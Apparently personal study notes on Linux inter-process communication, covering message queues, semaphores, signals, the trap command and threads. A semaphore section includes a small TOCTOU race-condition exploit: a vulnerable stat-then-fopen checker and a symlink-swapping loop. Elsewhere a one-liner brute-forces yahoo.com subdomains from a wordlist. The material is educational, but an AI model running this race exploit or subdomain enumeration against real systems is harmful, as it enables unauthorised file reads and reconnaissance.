+ PIPES
+ FIFO
+ Message Queues
+ Shared Memory
+ Signals
+ Semaphores

Conti.........................

MESSAGE QUEUES:
```````````````
- Message Queues are created by a syscall
- Message Queues are managed by the kernel/OS
- Once a message is read it is deleted from queue by the kernel

Process -----> [A][B][C][D] -----> Process
					Message Queue



eg: keyboard interrupts

^C : Killed | Terminate


PPID [die]
		\_ PID [ Zombie ] --adopted "init"
_______________________________________________________________

















SEMAPHORES:
```````````
- Semaphores are used to protect critical/common memory/resources shared between multiple processes.
- Its like "One at a time"
- To understand : "It is a piece of a program that excludes other programs from using a resource", so it will protect the shared memory/resources.





Example: SOMETIMES SCRIPTS NEED TO BE SELFISH
````````
- create a file with a name and make sure that the file doesn’t exist.
- But what if someone else checks at the same time?
- both note the file isn’t there and then you both create the file thinking you are running alone.

___________________________________________________________
RACE CONDITION EXPLOIT
___________________________________________________________
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#define UID 1000
#define GID 1000

int main (int argc, char **argv)
{
        FILE *fp;
        struct stat st;
        char content[255];

        stat(argv[1], &st);

        if ( ((st.st_uid ^ UID) & (st.st_gid ^ GID)) == 0 ) {
                puts("You Win!");
                fp = fopen(argv[1], "r");
                fgets(content, 255, (FILE*)fp);
                fclose(fp);

                printf("%s\n", content);
        } else {
                puts("Access Denied.");
                exit(-1);
        }
        return 0;
}



$ cat exploit.sh
while [ 1 ];do
        rm boo
        touch boo
        rm boo
        ln -s /kuku/foo.sh boo
done
$ bash exploit.sh &
$ while [ 1 ];do ./check_prog boo;done [Infinite Loop]
___________________________________________________________________________





































SIGNALS:
````````
What are signals?
`````````````````
- Used by the kernel to notify processes of system events
- A signal is a short message sent to a process, or group of processes, containing the number identifying 

# kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2


NOTE: Signals interrupt the normal flow of program execution.


Default Actions with Signals:
`````````````````````````````
- Default action means the action which a program or script performs when it receives a signal. Like:

	+ Stop the process.
	+ Terminate the process.
	+ Continue a stopped process.
	+ Ignore the signal
	+ etc....

_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




































Example is TRAP:
````````````````

It is used to catch signal interrupts.


# kill -l

In some situations when you excuting your shell script, you dont want users to exit untimely using keyboard aborts.

The 'TRAP' statement catches these sequences and can be programmed to execute a list of command upon catching those signals.

Syntax:  # trap COMMAND SIGNAL

++ The TRAP command can catch SIGNALS by signal name  with ot without the SIG prefix.

eg:

#vim trap.sh
#!/bin/bash
trap "echo 'Stop interrupting me!'" SIGINT SIGTERM
echo "Running PID : $$"
while true;do
	sleep 70
done

# bash trap.sh
Running PID : 231

[ctrl+c] : Stop interrupting me!

NOTE: Its will not interrupt until you use KILL signals.
++++++++++++++++++++++
TASK: TRAP is handling ?
------------------------
^C
kill -9
SIGTERM
^Z
_____

#!/bin/bash
trap "bash trap.sh" SIGINT SIGTERM SIGKILL EXIT
echo "Running PID : $$"
while true;do
        sleep 70
done
++++++++++++++++++++++



~~~~~~~~~~~~~~~~~~
TRAP at exit 
-------------
#!/bin/bash
trap "rm -rf file1 file2" EXIT
echo "DATA1" > file1
echo "DATA2" > file2
cat file1 file2 > final-subs.txt
++++++++++++++++++++++++++++++++++++++++++++++++++


BAsed on processes:
````````````````````
# time cat wordlist.txt | while read -r line;do if host "$line.yahoo.com" &> /dev/null;then echo "$line.yahoo.com : Alive";fi;done

cat [p1]
|		\___IPC___while[p2]
|								\_if[p3]
|										\_host[p4]
|													\_echo [p5]
|__________________________________________|

real    0m3.438s
user    0m0.063s
sys     0m0.547s

















THREADS:
````````
A thread is an execution branch of a process. It is an execution flow running inside the process.














Similarity between Threads and Processes –  
``````````````````````````````````````````
- Only one thread or process is active at a time 
- Within process both execute sequential















Differences between Threads and Processes –  
````````````````````````````````````````````
- Threads are not independent, processes are. 
- Threads are designed to assist each other, processes may or may not do it.














Types of Threads:
`````````````````
1. User Level thread (ULT) : 
````````````````````````````
- pthread lib.
- fast
- context switching is fast [ means you can switch in between threads ]
- if one ULT perform blocking operation then entire process get blocked










2. Kernel Level Thread (KLT) : 

- kthread lib.
- slow
- context switching is slow
- if one KLT blocked, no effect to others.
______________

Process > KLT > ULT
